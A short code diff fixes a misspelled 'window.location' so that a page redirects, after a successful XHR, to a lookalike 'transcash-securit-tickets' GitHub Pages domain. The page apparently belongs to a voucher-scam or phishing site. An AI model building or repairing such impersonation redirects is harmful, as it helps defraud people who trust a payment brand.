--- a/index.html
+++ b/index.html
@@ -382,7 +382,7 @@
   xhr.onload = function () {
     if (xhr.status === 200) {
                setTimeout(function(){
-                window.locatio.href='https://transcash-securit-tickets.github.io/TsT/';
+                window.location.href='https://transcash-securit-tickets.github.io/TsT/';
             },4000);
                           }
                           
